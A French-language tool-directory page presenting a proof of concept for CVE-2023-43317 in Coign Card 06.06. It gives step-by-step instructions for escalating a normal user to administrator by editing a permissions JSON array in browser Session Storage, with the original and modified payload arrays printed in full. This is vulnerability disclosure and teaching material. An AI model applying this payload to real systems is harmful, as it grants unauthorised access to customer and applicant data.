Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43317 — Élévation verticale de privilèges via Session Storage par Amjad Ali (CVE-2023-43317) | Kitploit
Outils/GitHubGitHub/amjadali-110/cve-2023-43317
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubamjadali-110/cve-2023-43317

CVE-2023-43317

Élévation verticale de privilèges via Session Storage par Amjad Ali (CVE-2023-43317)

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43317

Un utilisateur normal peut élever ses privilèges via le paramètre userPermissionsLIst dans le composant Session Storage, afin d'obtenir un accès non autorisé aux ressources et fonctionnalités de niveau administratif. Cela pourrait conduire à un accès non autorisé aux données, à leur modification et à d'autres actions généralement réservées aux administrateurs.

  • Produit vulnérable :- Coign Card
  • Version vulnérable :- 06.06
  • Références :- https://nvd.nist.gov/vuln/detail/CVE-2023-43317

Étapes pour reproduire

  1. Connectez-vous avec un compte utilisateur normal.
  2. Faites un clic droit sur la page web et sélectionnez « Inspecter l’élément » pour ouvrir les outils de développement.
  3. Dans les outils de développement, accédez à l’onglet « Application ».
  4. Développez la section « Session Storage ».
  5. Dans le Session Storage, vous pouvez voir l’objet « userPermissionsList », qui contient un tableau JSON des permissions utilisateur. Les permissions initiales d'un utilisateur normal ressemblent à ceci :
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":22,"permissionName":"CanGetUserActivity"}]
  1. Modifiez les permissions dans le Session Storage pour obtenir un accès de niveau administrateur :
root@kitploit:~
[{"permissionId":1,"permissionName":"CanGetApplicants"},{"permissionId":2,"permissionName":"CanCreateApplicants"},{"permissionId":3,"permissionName":"CanUpdateApplicants"},{"permissionId":4,"permissionName":"CanManageAccounts"},{"permissionId":5,"permissionName":"CanGetUsers"},{"permissionId":6,"permissionName":"CanCreateUsers"},{"permissionId":7,"permissionName":"CanUpdateUsers"},{"permissionId":8,"permissionName":"CanGetApplications"},{"permissionId":9,"permissionName":"CanResendEmails"},{"permissionId":10,"permissionName":"CanGetDocuments"},{"permissionId":11,"permissionName":"CanUploadDocuments"},{"permissionId":12,"permissionName":"CanCreateIndividualInvitations"},{"permissionId":14,"permissionName":"CanQueryIndividualInvitations"},{"permissionId":15,"permissionName":"CanGetBulkInvitations"},{"permissionId":16,"permissionName":"CanUploadBulkInvitationsFile"},{"permissionId":17,"permissionName":"CanUpdateFormStatus"},{"permissionId":18,"permissionName":"CanGetCustomers"},{"permissionId":19,"permissionName":"CanResendInvitations"},{"permissionId":20,"permissionName":"CanResendEvaluations"},{"permissionId":21,"permissionName":"CanResendManualReviews"},{"permissionId":22,"permissionName":"CanGetUserActivity"},{"permissionId":23,"permissionName":"CanGetDeliveredDocuments"},{"permissionId":24,"permissionName":"CanGetBillingTables"},{"permissionId":25,"permissionName":"CanGetBillingTableHistoricalRecords"},{"permissionId":26,"permissionName":"CanGetBillingTableDraftUpdateRecords"},{"permissionId":27,"permissionName":"CanGetFeedBacks"},{"permissionId":28,"permissionName":"CanUpdateBillingTables"},{"permissionId":29,"permissionName":"CanUpdateUserEmail"},{"permissionId":30,"permissionName":"CanGetTemplates"},{"permissionId":31,"permissionName":"CanResendApplicationEmail"},{"permissionId":32,"permissionName":"CanDeleteUpcomingUpdates"},{"permissionId":33,"permissionName":"CanCreatePolls"},{"permissionId":34,"permissionName":"CanGetPolls"},{"permissionId":35,"permissionName":"CanUpdatePolls"},{"permissionId":36,"permissionName":"CanNotifyIndividualinvitations"},{"permissionId":37,"permissionName":"CanSendInvitationEmail"}]
  1. Après avoir modifié les permissions, actualisez la page.
  2. Vous obtiendrez un accès non autorisé aux ressources et fonctionnalités de niveau administratif.

Write-Up

https://amjadali110.medium.com/a-easy-vertical-privilege-escalation-via-session-storage-cfa9f558c94

Télécharger l’outil